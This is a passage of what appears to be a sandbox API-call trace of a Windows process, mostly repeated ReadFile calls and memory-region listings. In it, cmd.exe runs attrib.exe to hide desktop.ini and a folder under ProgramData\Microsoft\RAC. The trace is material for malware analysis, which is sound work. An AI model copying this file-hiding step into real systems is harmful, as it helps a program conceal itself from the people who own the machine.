[0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 
[0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.894] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, 
lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, 
lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.917] _close (_FileHandle=4) returned 0 [0119.917] FindNextFileW (in: hFindFile=0x21e6b8, lpFindFileData=0x12ee40 | out: 
lpFindFileData=0x12ee40) returned 0 [0119.918] GetLastError () returned 0x12 [0119.918] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.918] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0119.920] _close (_FileHandle=3) returned 0 [0119.920] GetConsoleTitleW (in: lpConsoleTitle=0x12f278, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.921] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.921] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.921] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.921] GetLastError () returned 0x2 [0119.921] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.921] GetLastError () returned 0x2 [0119.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0x21e6b8 [0119.921] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.922] 
GetLastError () returned 0x2 [0119.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0x21e6b8 [0119.922] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.922] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.922] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.922] GetConsoleTitleW (in: lpConsoleTitle=0x12f00c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.922] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ee94, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12ef5c | out: lpAttributeList=0x12ee94, lpSize=0x12ef5c) returned 1 [0119.922] UpdateProcThreadAttribute (in: lpAttributeList=0x12ee94, dwFlags=0x0, Attribute=0x60001, lpValue=0x12ef54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ee94, lpPreviousValue=0x0) returned 1 [0119.922] GetStartupInfoW (in: lpStartupInfo=0x12ee50 | out: lpStartupInfo=0x12ee50*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0119.922] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.922] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12eef0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ef3c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", lpProcessInformation=0x12ef3c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xf6c, dwThreadId=0xf70)) returned 1 [0119.931] CloseHandle (hObject=0x50) returned 1 [0119.931] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.931] GetEnvironmentStringsW () returned 0x222dd0* [0119.931] FreeEnvironmentStringsW (penv=0x222dd0) returned 1 [0119.931] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0119.968] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12ee30 | out: lpExitCode=0x12ee30*=0x0) returned 1 [0119.968] CloseHandle (hObject=0x4c) returned 1 [0119.968] _vsnwprintf (in: _Buffer=0x12ef78, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ee3c | out: _Buffer="00000000") returned 8 [0119.968] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.968] GetEnvironmentStringsW () returned 0x222dd0* [0119.968] FreeEnvironmentStringsW (penv=0x222dd0) returned 1 [0119.968] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.968] GetEnvironmentStringsW () returned 0x222dd0* [0119.969] FreeEnvironmentStringsW (penv=0x222dd0) returned 1 [0119.969] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ee94 | out: lpAttributeList=0x12ee94) [0119.969] GetConsoleTitleW (in: lpConsoleTitle=0x12f278, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.969] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.969] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.969] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.969] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.969] GetLastError () returned 0x2 [0119.969] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.969] GetLastError () returned 0x2 [0119.969] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0x21e6b8 [0119.969] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0xffffffff [0119.970] GetLastError () returned 0x2 [0119.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12eb14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb14) returned 0x21e6b8 [0119.970] FindClose (in: hFindFile=0x21e6b8 | out: hFindFile=0x21e6b8) returned 1 [0119.970] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.970] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.970] GetConsoleTitleW (in: 
lpConsoleTitle=0x12f00c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.970] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ee94, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12ef5c | out: lpAttributeList=0x12ee94, lpSize=0x12ef5c) returned 1 [0119.970] UpdateProcThreadAttribute (in: lpAttributeList=0x12ee94, dwFlags=0x0, Attribute=0x60001, lpValue=0x12ef54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ee94, lpPreviousValue=0x0) returned 1 [0119.970] GetStartupInfoW (in: lpStartupInfo=0x12ee50 | out: lpStartupInfo=0x12ee50*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0119.970] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.970] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12eef0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ef3c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", lpProcessInformation=0x12ef3c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf74, dwThreadId=0xf78)) returned 1 [0119.972] CloseHandle (hObject=0x4c) returned 1 [0119.972] 
SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.972] GetEnvironmentStringsW () returned 0x223808* [0119.972] FreeEnvironmentStringsW (penv=0x223808) returned 1 [0119.972] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0120.216] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12ee30 | out: lpExitCode=0x12ee30*=0x0) returned 1 [0120.216] CloseHandle (hObject=0x50) returned 1 [0120.216] _vsnwprintf (in: _Buffer=0x12ef78, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ee3c | out: _Buffer="00000000") returned 8 [0120.216] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0120.216] GetEnvironmentStringsW () returned 0x223808* [0120.216] FreeEnvironmentStringsW (penv=0x223808) returned 1 [0120.216] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.216] GetEnvironmentStringsW () returned 0x223808* [0120.216] FreeEnvironmentStringsW (penv=0x223808) returned 1 [0120.216] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ee94 | out: lpAttributeList=0x12ee94) [0120.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.216] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.217] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.217] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.217] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.217] SetConsoleInputExeNameW () returned 0x1 [0120.217] GetConsoleOutputCP () returned 0x1b5 [0120.217] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.217] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.217] exit (_Code=0) Process: id = "69" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = 
"0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0xf3c" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9436 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9437 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9438 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9439 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9440 start_va = 0x230000 end_va = 0x236fff entry_point = 0x230000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 9441 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9442 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9443 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 
